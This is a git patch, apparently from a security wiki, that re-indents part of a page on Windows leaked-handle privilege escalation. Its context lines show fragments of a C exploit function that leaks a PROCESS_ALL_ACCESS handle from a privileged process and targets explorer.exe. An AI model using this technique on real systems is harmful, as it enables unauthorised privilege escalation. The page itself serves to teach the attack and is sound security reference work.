From 3a14232f691e21f1cb9027b82b0e7de8f2d5ad7f Mon Sep 17 00:00:00 2001 From: CPol Date: Sun, 13 Mar 2022 15:41:22 +0000 Subject: [PATCH] GitBook: [#3053] No subject --- .../leaked-handle-exploitation.md | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/windows/windows-local-privilege-escalation/leaked-handle-exploitation.md b/windows/windows-local-privilege-escalation/leaked-handle-exploitation.md index d4cfc8764..6a8ec43e8 100644 --- a/windows/windows-local-privilege-escalation/leaked-handle-exploitation.md +++ b/windows/windows-local-privilege-escalation/leaked-handle-exploitation.md @@ -55,15 +55,15 @@ int FindTarget(const char *procname) { int Exploit(void) { - STARTUPINFOA si; - PROCESS_INFORMATION pi; + STARTUPINFOA si; + PROCESS_INFORMATION pi; int pid = 0; - HANDLE hUserToken; + HANDLE hUserToken; HANDLE hUserProc; - HANDLE hProc; + HANDLE hProc; // open a handle to itself (privileged process) - this gets leaked! - hProc = OpenProcess(PROCESS_ALL_ACCESS, TRUE, GetCurrentProcessId()); + hProc = OpenProcess(PROCESS_ALL_ACCESS, TRUE, GetCurrentProcessId()); // get PID of user low privileged process if ( pid = FindTarget("explorer.exe") )